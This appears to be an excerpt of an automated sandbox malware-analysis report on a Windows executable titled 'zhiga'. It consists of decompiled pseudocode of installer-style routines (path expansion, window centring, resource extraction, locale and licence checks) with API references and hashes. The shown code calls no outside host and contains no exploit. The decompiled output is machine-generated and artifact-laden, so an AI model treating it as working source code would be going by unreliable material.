                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$DialogText$DesktopForegroundItem
                                                          • String ID: zhiga
                                                          • API String ID: 852535152-3705506974
                                                          • Opcode ID: 205fcb1049f21ba9717040d8438215a074bc8e990e6c549b64a81a301c587017
                                                          • Instruction ID: 9a3bb731f791ec2e33c3f57fc20ca0f50e04df17924fd6009d3cf5425e251f30
                                                          • Opcode Fuzzy Hash: 205fcb1049f21ba9717040d8438215a074bc8e990e6c549b64a81a301c587017
                                                          • Instruction Fuzzy Hash: ED019235360118EFD7265F69D80C96DBA65FB85B50B008018FEC68A584DE36A941CF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 95%
                                                          			E010C2AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t16;
                                                          				int _t21;
                                                          				char _t32;
                                                          				intOrPtr _t34;
                                                          				char* _t38;
                                                          				char _t42;
                                                          				char* _t44;
                                                          				CHAR* _t52;
                                                          				intOrPtr* _t55;
                                                          				CHAR* _t59;
                                                          				void* _t62;
                                                          				CHAR* _t64;
                                                          				CHAR* _t65;
                                                          				signed int _t66;
                                                          
                                                          				_t60 = __edx;
                                                          				_t16 =  *0x10c8004; // 0x4b13cf70
                                                          				_t17 = _t16 ^ _t66;
                                                          				_v8 = _t16 ^ _t66;
                                                          				_t65 = _a4;
                                                          				_t44 = __edx;
                                                          				_t64 = __ecx;
                                                          				if( *((char*)(__ecx)) != 0) {
                                                          					GetModuleFileNameA( *0x10c9a3c,  &_v268, 0x104);
                                                          					while(1) {
                                                          						_t17 =  *_t64;
                                                          						if(_t17 == 0) {
                                                          							break;
                                                          						}
                                                          						_t21 = IsDBCSLeadByte(_t17);
                                                          						 *_t65 =  *_t64;
                                                          						if(_t21 != 0) {
                                                          							_t65[1] = _t64[1];
                                                          						}
                                                          						if( *_t64 != 0x23) {
                                                          							L19:
                                                          							_t65 = CharNextA(_t65);
                                                          						} else {
                                                          							_t64 = CharNextA(_t64);
                                                          							if(CharUpperA( *_t64) != 0x44) {
                                                          								if(CharUpperA( *_t64) != 0x45) {
                                                          									if( *_t64 == 0x23) {
                                                          										goto L19;
                                                          									}
                                                          								} else {
                                                          									E010C1680(_t65, E010C17C8(_t44, _t65),  &_v268);
                                                          									_t52 = _t65;
                                                          									_t14 =  &(_t52[1]); // 0x2
                                                          									_t60 = _t14;
                                                          									do {
                                                          										_t32 =  *_t52;
                                                          										_t52 =  &(_t52[1]);
                                                          									} while (_t32 != 0);
                                                          									goto L17;
                                                          								}
                                                          							} else {
                                                          								E010C65E8( &_v268);
                                                          								_t55 =  &_v268;
                                                          								_t62 = _t55 + 1;
                                                          								do {
                                                          									_t34 =  *_t55;
                                                          									_t55 = _t55 + 1;
                                                          								} while (_t34 != 0);
                                                          								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                          								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                          									 *_t38 = 0;
                                                          								}
                                                          								E010C1680(_t65, E010C17C8(_t44, _t65),  &_v268);
                                                          								_t59 = _t65;
                                                          								_t12 =  &(_t59[1]); // 0x2
                                                          								_t60 = _t12;
                                                          								do {
                                                          									_t42 =  *_t59;
                                                          									_t59 =  &(_t59[1]);
                                                          								} while (_t42 != 0);
                                                          								L17:
                                                          								_t65 =  &(_t65[_t52 - _t60]);
                                                          							}
                                                          						}
                                                          						_t64 = CharNextA(_t64);
                                                          					}
                                                          					 *_t65 = _t17;
                                                          				}
                                                          				return E010C6CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                          			}






















                                                          0x010c2aac
                                                          0x010c2ab7
                                                          0x010c2abc
                                                          0x010c2abe
                                                          0x010c2ac3
                                                          0x010c2ac6
                                                          0x010c2ac9
                                                          0x010c2ace
                                                          0x010c2ae6
                                                          0x010c2bdc
                                                          0x010c2bdc
                                                          0x010c2be0
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2af2
                                                          0x010c2afc
                                                          0x010c2b00
                                                          0x010c2b05
                                                          0x010c2b05
                                                          0x010c2b0b
                                                          0x010c2bca
                                                          0x010c2bd1
                                                          0x010c2b11
                                                          0x010c2b18
                                                          0x010c2b26
                                                          0x010c2b99
                                                          0x010c2bc8
                                                          0x00000000
                                                          0x00000000
                                                          0x010c2b9b
                                                          0x010c2bae
                                                          0x010c2bb3
                                                          0x010c2bb5
                                                          0x010c2bb5
                                                          0x010c2bb8
                                                          0x010c2bb8
                                                          0x010c2bba
                                                          0x010c2bbb
                                                          0x00000000
                                                          0x010c2bb8
                                                          0x010c2b28
                                                          0x010c2b2e
                                                          0x010c2b33
                                                          0x010c2b39
                                                          0x010c2b3c
                                                          0x010c2b3c
                                                          0x010c2b3e
                                                          0x010c2b3f
                                                          0x010c2b55
                                                          0x010c2b5d
                                                          0x010c2b64
                                                          0x010c2b64
                                                          0x010c2b7a
                                                          0x010c2b7f
                                                          0x010c2b81
                                                          0x010c2b81
                                                          0x010c2b84
                                                          0x010c2b84
                                                          0x010c2b86
                                                          0x010c2b87
                                                          0x010c2bbf
                                                          0x010c2bc1
                                                          0x010c2bc1
                                                          0x010c2b26
                                                          0x010c2bda
                                                          0x010c2bda
                                                          0x010c2be6
                                                          0x010c2be6
                                                          0x010c2bf8

                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 010C2AE6
                                                          • IsDBCSLeadByte.KERNEL32(00000000), ref: 010C2AF2
                                                          • CharNextA.USER32(?), ref: 010C2B12
                                                          • CharUpperA.USER32 ref: 010C2B1E
                                                          • CharPrevA.USER32(?,?), ref: 010C2B55
                                                          • CharNextA.USER32(?), ref: 010C2BD4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                          • String ID:
                                                          • API String ID: 571164536-0
                                                          • Opcode ID: 58b561c74bb137219a7bc5deac4f925dffe5e6873d6e3b9811b74bc5c0406088
                                                          • Instruction ID: 07fa600ebdfaf76df3260182067001853f4d15c321452361df46461ffefe34ff
                                                          • Opcode Fuzzy Hash: 58b561c74bb137219a7bc5deac4f925dffe5e6873d6e3b9811b74bc5c0406088
                                                          • Instruction Fuzzy Hash: F3412A346042499FDB669F38C854AFE7FA99F96740F1400DEDCC283646DB3A8A46CF50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E010C43D0(struct HWND__* __ecx, struct HWND__* __edx) {
                                                          				signed int _v8;
                                                          				struct tagRECT _v24;
                                                          				struct tagRECT _v40;
                                                          				struct HWND__* _v44;
                                                          				intOrPtr _v48;
                                                          				int _v52;
                                                          				intOrPtr _v56;
                                                          				int _v60;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t29;
                                                          				void* _t53;
                                                          				intOrPtr _t56;
                                                          				int _t59;
                                                          				struct HWND__* _t63;
                                                          				struct HWND__* _t67;
                                                          				struct HWND__* _t68;
                                                          				struct HDC__* _t69;
                                                          				int _t72;
                                                          				signed int _t74;
                                                          
                                                          				_t63 = __edx;
                                                          				_t29 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t29 ^ _t74;
                                                          				_t68 = __edx;
                                                          				_v44 = __ecx;
                                                          				GetWindowRect(__ecx,  &_v40);
                                                          				_t53 = _v40.bottom - _v40.top;
                                                          				_v48 = _v40.right - _v40.left;
                                                          				GetWindowRect(_t68,  &_v24);
                                                          				_v56 = _v24.bottom - _v24.top;
                                                          				_t69 = GetDC(_v44);
                                                          				_v52 = GetDeviceCaps(_t69, 8);
                                                          				_v60 = GetDeviceCaps(_t69, 0xa);
                                                          				ReleaseDC(_v44, _t69);
                                                          				_t56 = _v48;
                                                          				asm("cdq");
                                                          				_t72 = (_v24.right - _v24.left - _t56 - _t63 >> 1) + _v24.left;
                                                          				_t67 = 0;
                                                          				if(_t72 >= 0) {
                                                          					_t63 = _v52;
                                                          					if(_t72 + _t56 > _t63) {
                                                          						_t72 = _t63 - _t56;
                                                          					}
                                                          				} else {
                                                          					_t72 = _t67;
                                                          				}
                                                          				asm("cdq");
                                                          				_t59 = (_v56 - _t53 - _t63 >> 1) + _v24.top;
                                                          				if(_t59 >= 0) {
                                                          					_t63 = _v60;
                                                          					if(_t59 + _t53 > _t63) {
                                                          						_t59 = _t63 - _t53;
                                                          					}
                                                          				} else {
                                                          					_t59 = _t67;
                                                          				}
                                                          				return E010C6CE0(SetWindowPos(_v44, _t67, _t72, _t59, _t67, _t67, 5), _t53, _v8 ^ _t74, _t63, _t67, _t72);
                                                          			}
























                                                          0x010c43d0
                                                          0x010c43d8
                                                          0x010c43df
                                                          0x010c43e6
                                                          0x010c43ec
                                                          0x010c43f1
                                                          0x010c4400
                                                          0x010c4403
                                                          0x010c440b
                                                          0x010c4420
                                                          0x010c4429
                                                          0x010c4437
                                                          0x010c4444
                                                          0x010c4447
                                                          0x010c444d
                                                          0x010c4454
                                                          0x010c445b
                                                          0x010c4460
                                                          0x010c4461
                                                          0x010c4467
                                                          0x010c446f
                                                          0x010c4473
                                                          0x010c4473
                                                          0x010c4463
                                                          0x010c4463
                                                          0x010c4463
                                                          0x010c447a
                                                          0x010c4481
                                                          0x010c4484
                                                          0x010c448a
                                                          0x010c4492
                                                          0x010c4496
                                                          0x010c4496
                                                          0x010c4486
                                                          0x010c4486
                                                          0x010c4486
                                                          0x010c44b8

                                                          APIs
                                                          • GetWindowRect.USER32(?,?), ref: 010C43F1
                                                          • GetWindowRect.USER32(00000000,?), ref: 010C440B
                                                          • GetDC.USER32(?), ref: 010C4423
                                                          • GetDeviceCaps.GDI32(00000000,00000008), ref: 010C442E
                                                          • GetDeviceCaps.GDI32(00000000,0000000A), ref: 010C443A
                                                          • ReleaseDC.USER32(?,00000000), ref: 010C4447
                                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,00000005,?,?), ref: 010C44A2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Window$CapsDeviceRect$Release
                                                          • String ID:
                                                          • API String ID: 2212493051-0
                                                          • Opcode ID: 740fd3f967d1c0983a678ba23deb929a250b25ccac46eb81ada3a7d455e4f733
                                                          • Instruction ID: bb5363fe2ddf68e066c501eca35ce0362edaaf65007b9e319d507c560fb85e2e
                                                          • Opcode Fuzzy Hash: 740fd3f967d1c0983a678ba23deb929a250b25ccac46eb81ada3a7d455e4f733
                                                          • Instruction Fuzzy Hash: 0B311C72E00119AFCB14CFB8D9889EEBBB5FB89310F254169F845F3244EA356D058F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 53%
                                                          			E010C6298(intOrPtr __ecx, intOrPtr* __edx) {
                                                          				signed int _v8;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				struct HINSTANCE__* _v36;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t16;
                                                          				struct HRSRC__* _t21;
                                                          				intOrPtr _t26;
                                                          				void* _t30;
                                                          				struct HINSTANCE__* _t36;
                                                          				intOrPtr* _t40;
                                                          				void* _t41;
                                                          				intOrPtr* _t44;
                                                          				intOrPtr* _t45;
                                                          				void* _t47;
                                                          				signed int _t50;
                                                          				struct HINSTANCE__* _t51;
                                                          
                                                          				_t44 = __edx;
                                                          				_t16 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t16 ^ _t50;
                                                          				_t46 = 0;
                                                          				_v32 = __ecx;
                                                          				_v36 = 0;
                                                          				_t36 = 1;
                                                          				E010C171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                          				while(1) {
                                                          					_t51 = _t51 + 0x10;
                                                          					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                          					if(_t21 == 0) {
                                                          						break;
                                                          					}
                                                          					_t45 = LockResource(LoadResource(_t46, _t21));
                                                          					if(_t45 == 0) {
                                                          						 *0x10c9124 = 0x80070714;
                                                          						_t36 = _t46;
                                                          					} else {
                                                          						_t5 = _t45 + 8; // 0x8
                                                          						_t44 = _t5;
                                                          						_t40 = _t44;
                                                          						_t6 = _t40 + 1; // 0x9
                                                          						_t47 = _t6;
                                                          						do {
                                                          							_t26 =  *_t40;
                                                          							_t40 = _t40 + 1;
                                                          						} while (_t26 != 0);
                                                          						_t41 = _t40 - _t47;
                                                          						_t46 = _t51;
                                                          						_t7 = _t41 + 1; // 0xa
                                                          						 *0x10ca288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                          						_t30 = _v32();
                                                          						if(_t51 != _t51) {
                                                          							asm("int 0x29");
                                                          						}
                                                          						_push(_t45);
                                                          						if(_t30 == 0) {
                                                          							_t36 = 0;
                                                          							FreeResource(??);
                                                          						} else {
                                                          							FreeResource();
                                                          							_v36 = _v36 + 1;
                                                          							E010C171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                          							_t46 = 0;
                                                          							continue;
                                                          						}
                                                          					}
                                                          					L12:
                                                          					return E010C6CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                          				}
                                                          				goto L12;
                                                          			}






















                                                          0x010c6298
                                                          0x010c62a0
                                                          0x010c62a7
                                                          0x010c62ad
                                                          0x010c62af
                                                          0x010c62bb
                                                          0x010c62c3
                                                          0x010c62c4
                                                          0x010c633b
                                                          0x010c633b
                                                          0x010c6345
                                                          0x010c634d
                                                          0x00000000
                                                          0x00000000
                                                          0x010c62da
                                                          0x010c62de
                                                          0x010c635f
                                                          0x010c6369
                                                          0x010c62e0
                                                          0x010c62e0
                                                          0x010c62e0
                                                          0x010c62e3
                                                          0x010c62e5
                                                          0x010c62e5
                                                          0x010c62e8
                                                          0x010c62e8
                                                          0x010c62ea
                                                          0x010c62eb
                                                          0x010c62ef
                                                          0x010c62f1
                                                          0x010c62f3
                                                          0x010c6302
                                                          0x010c6308
                                                          0x010c630d
                                                          0x010c6314
                                                          0x010c6314
                                                          0x010c6316
                                                          0x010c6319
                                                          0x010c6355
                                                          0x010c6357
                                                          0x010c631b
                                                          0x010c631b
                                                          0x010c6331
                                                          0x010c6334
                                                          0x010c6339
                                                          0x00000000
                                                          0x010c6339
                                                          0x010c6319
                                                          0x010c636b
                                                          0x010c637d
                                                          0x010c637d
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 010C171E: _vsnprintf.MSVCRT ref: 010C1750
                                                          • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,010C51CA,00000004,00000024,010C2F71,?,00000002,00000000), ref: 010C62CD
                                                          • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,010C51CA,00000004,00000024,010C2F71,?,00000002,00000000), ref: 010C62D4
                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010C51CA,00000004,00000024,010C2F71,?,00000002,00000000), ref: 010C631B
                                                          • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 010C6345
                                                          • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,010C51CA,00000004,00000024,010C2F71,?,00000002,00000000), ref: 010C6357
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                          • String ID: UPDFILE%lu
                                                          • API String ID: 2922116661-2329316264
                                                          • Opcode ID: 4093f76cc5c386d89aa2f5a6100dd76341c30a4e82cf5f1567eb7ac5e8b2690d
                                                          • Instruction ID: e57cce3576bb40d0073e019d2545f8fe6f25ea2aea9a0e88d7b08c6f4d94dcc1
                                                          • Opcode Fuzzy Hash: 4093f76cc5c386d89aa2f5a6100dd76341c30a4e82cf5f1567eb7ac5e8b2690d
                                                          • Instruction Fuzzy Hash: B921B675A00219EFDB209FA5DC459FE7B78FB44B54B10415DFA82A3241D73B99028FE0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C681F(void* __ebx) {
                                                          				signed int _v8;
                                                          				char _v20;
                                                          				struct _OSVERSIONINFOA _v168;
                                                          				void* _v172;
                                                          				int* _v176;
                                                          				int _v180;
                                                          				int _v184;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t19;
                                                          				long _t31;
                                                          				signed int _t35;
                                                          				void* _t36;
                                                          				intOrPtr _t41;
                                                          				signed int _t44;
                                                          
                                                          				_t36 = __ebx;
                                                          				_t19 =  *0x10c8004; // 0x4b13cf70
                                                          				_v8 = _t19 ^ _t44;
                                                          				_t41 =  *0x10c81d8; // 0xfffffffe
                                                          				_t43 = 0;
                                                          				_v180 = 0xc;
                                                          				_v176 = 0;
                                                          				if(_t41 == 0xfffffffe) {
                                                          					 *0x10c81d8 = 0;
                                                          					_v168.dwOSVersionInfoSize = 0x94;
                                                          					if(GetVersionExA( &_v168) == 0) {
                                                          						L12:
                                                          						_t41 =  *0x10c81d8; // 0xfffffffe
                                                          					} else {
                                                          						_t41 = 1;
                                                          						if(_v168.dwPlatformId != 1 || _v168.dwMajorVersion != 4 || _v168.dwMinorVersion >= 0xa || GetSystemMetrics(0x4a) == 0 || RegOpenKeyExA(0x80000001, "Control Panel\\Desktop\\ResourceLocale", 0, 0x20019,  &_v172) != 0) {
                                                          							goto L12;
                                                          						} else {
                                                          							_t31 = RegQueryValueExA(_v172, 0x10c1140, 0,  &_v184,  &_v20,  &_v180);
                                                          							_t43 = _t31;
                                                          							RegCloseKey(_v172);
                                                          							if(_t31 != 0) {
                                                          								goto L12;
                                                          							} else {
                                                          								_t40 =  &_v176;
                                                          								if(E010C66F9( &_v20,  &_v176) == 0) {
                                                          									goto L12;
                                                          								} else {
                                                          									_t35 = _v176 & 0x000003ff;
                                                          									if(_t35 == 1 || _t35 == 0xd) {
                                                          										 *0x10c81d8 = _t41;
                                                          									} else {
                                                          										goto L12;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return E010C6CE0(_t41, _t36, _v8 ^ _t44, _t40, _t41, _t43);
                                                          			}


















                                                          0x010c681f
                                                          0x010c682a
                                                          0x010c6831
                                                          0x010c6836
                                                          0x010c683c
                                                          0x010c683e
                                                          0x010c6848
                                                          0x010c6851
                                                          0x010c685d
                                                          0x010c6864
                                                          0x010c6876
                                                          0x010c693a
                                                          0x010c693a
                                                          0x010c687c
                                                          0x010c687e
                                                          0x010c6885
                                                          0x00000000
                                                          0x010c68d6
                                                          0x010c68f4
                                                          0x010c6900
                                                          0x010c6902
                                                          0x010c690a
                                                          0x00000000
                                                          0x010c690c
                                                          0x010c690c
                                                          0x010c691c
                                                          0x00000000
                                                          0x010c691e
                                                          0x010c6924
                                                          0x010c692b
                                                          0x010c6932
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x010c692b
                                                          0x010c691c
                                                          0x010c690a
                                                          0x010c6885
                                                          0x010c6876
                                                          0x010c6951

                                                          APIs
                                                          • GetVersionExA.KERNEL32(?,00000000,00000002), ref: 010C686E
                                                          • GetSystemMetrics.USER32(0000004A), ref: 010C68A7
                                                          • RegOpenKeyExA.ADVAPI32(80000001,Control Panel\Desktop\ResourceLocale,00000000,00020019,?), ref: 010C68CC
                                                          • RegQueryValueExA.ADVAPI32(?,010C1140,00000000,?,?,0000000C), ref: 010C68F4
                                                          • RegCloseKey.ADVAPI32(?), ref: 010C6902
                                                            • Part of subcall function 010C66F9: CharNextA.USER32(?,00000001,00000000,00000000,?,?,?,010C691A), ref: 010C6741
                                                          Strings
                                                          • Control Panel\Desktop\ResourceLocale, xrefs: 010C68C2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
                                                          • String ID: Control Panel\Desktop\ResourceLocale
                                                          • API String ID: 3346862599-1109908249
                                                          • Opcode ID: bd4217b0402cdd8e70bf046901f19e82a1f5b6bcb2edac0beeb8aeb34d1982cb
                                                          • Instruction ID: 1426a188557a9ed8a7ac9c095328a539ac3c043fc2c98e2f44b709d39e859759
                                                          • Opcode Fuzzy Hash: bd4217b0402cdd8e70bf046901f19e82a1f5b6bcb2edac0beeb8aeb34d1982cb
                                                          • Instruction Fuzzy Hash: 89318231A00228DFDB318B15CC44BEEB7BCEB45B54F0041EAE989A6341D73699858F51
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E010C3A3F(void* __eflags) {
                                                          				void* _t3;
                                                          				void* _t9;
                                                          				CHAR* _t16;
                                                          
                                                          				_t16 = "LICENSE";
                                                          				_t1 = E010C468F(_t16, 0, 0) + 1; // 0x1
                                                          				_t3 = LocalAlloc(0x40, _t1);
                                                          				 *0x10c8d4c = _t3;
                                                          				if(_t3 != 0) {
                                                          					_t19 = _t16;
                                                          					if(E010C468F(_t16, _t3, _t28) != 0) {
                                                          						if(lstrcmpA( *0x10c8d4c, "<None>") == 0) {
                                                          							LocalFree( *0x10c8d4c);
                                                          							L9:
                                                          							 *0x10c9124 = 0;
                                                          							return 1;
                                                          						}
                                                          						_t9 = E010C6517(_t19, 0x7d1, 0, E010C3100, 0, 0);
                                                          						LocalFree( *0x10c8d4c);
                                                          						if(_t9 != 0) {
                                                          							goto L9;
                                                          						}
                                                          						 *0x10c9124 = 0x800704c7;
                                                          						L2:
                                                          						return 0;
                                                          					}
                                                          					E010C44B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                          					LocalFree( *0x10c8d4c);
                                                          					 *0x10c9124 = 0x80070714;
                                                          					goto L2;
                                                          				}
                                                          				E010C44B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                          				 *0x10c9124 = E010C6285();
                                                          				goto L2;
                                                          			}






                                                          0x010c3a46
                                                          0x010c3a57
                                                          0x010c3a5d
                                                          0x010c3a63
                                                          0x010c3a6a
                                                          0x010c3a91
                                                          0x010c3a9a
                                                          0x010c3ad8
                                                          0x010c3b13
                                                          0x010c3b19
                                                          0x010c3b1b
                                                          0x00000000
                                                          0x010c3b21
                                                          0x010c3ae7
                                                          0x010c3af4
                                                          0x010c3afc
                                                          0x00000000
                                                          0x00000000
                                                          0x010c3afe
                                                          0x010c3a87
                                                          0x00000000
                                                          0x010c3a87
                                                          0x010c3aa8
                                                          0x010c3ab3
                                                          0x010c3ab9
                                                          0x00000000
                                                          0x010c3ab9
                                                          0x010c3a78
                                                          0x010c3a82
                                                          0x00000000

                                                          APIs
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46A0
                                                            • Part of subcall function 010C468F: SizeofResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46A9
                                                            • Part of subcall function 010C468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010C46C3
                                                            • Part of subcall function 010C468F: LoadResource.KERNEL32(00000000,00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46CC
                                                            • Part of subcall function 010C468F: LockResource.KERNEL32(00000000,?,010C2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46D3
                                                            • Part of subcall function 010C468F: memcpy_s.MSVCRT ref: 010C46E5
                                                            • Part of subcall function 010C468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010C46EF
                                                          • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010C2F64,?,00000002,00000000), ref: 010C3A5D
                                                          • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 010C3AB3
                                                            • Part of subcall function 010C44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010C4518
                                                            • Part of subcall function 010C44B9: MessageBoxA.USER32(?,?,zhiga,00010010), ref: 010C4554
                                                            • Part of subcall function 010C6285: GetLastError.KERNEL32(010C5BBC), ref: 010C6285
                                                          • lstrcmpA.KERNEL32(<None>,00000000), ref: 010C3AD0
                                                          • LocalFree.KERNEL32 ref: 010C3B13
                                                            • Part of subcall function 010C6517: FindResourceA.KERNEL32(010C0000,000007D6,00000005), ref: 010C652A
                                                            • Part of subcall function 010C6517: LoadResource.KERNEL32(010C0000,00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 010C6538
                                                            • Part of subcall function 010C6517: DialogBoxIndirectParamA.USER32(010C0000,00000000,00000547,010C19E0,00000000), ref: 010C6557
                                                            • Part of subcall function 010C6517: FreeResource.KERNEL32(00000000,?,?,010C2EE8,00000000,010C19E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 010C6560
                                                          • LocalFree.KERNEL32(00000000,010C3100,00000000,00000000), ref: 010C3AF4
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.446316039.00000000010C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010C0000, based on PE: true
                                                          • Associated: 00000000.00000002.446310245.00000000010C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446323587.00000000010C8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CA000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.446329420.00000000010CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10c0000_file.jbxd
                                                          Similarity
                                                          • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                          • String ID: <None>$LICENSE
                                                          • API String ID: 2414642746-383193767
                                                          • Opcode ID: 004ca60bf6b04d7a55db27443f0cc3cdecbe0b218bade3c7cceddef2f5f7ae71
                                                          • Instruction ID: 6c64cde41e506e66da79611038c06601881978dc23e3a1dc190460975148b203
                                                          • Opcode Fuzzy Hash: 004ca60bf6b04d7a55db27443f0cc3cdecbe0b218bade3c7cceddef2f5f7ae71
                                                          • Instruction Fuzzy Hash: 3D11A571700201AFD7346B26AC09E5F7AA9FBD5F40B10802EB9C1DA184DA7F88108F64
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 94%
                                                          			E010C24E0(void* __ebx) {
                                                          				signed int _v8;
                                                          				char _v268;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				signed int _t7;
                                                          				void* _t20;
                                                          				long _t26;
                                                          				signed int _t27;
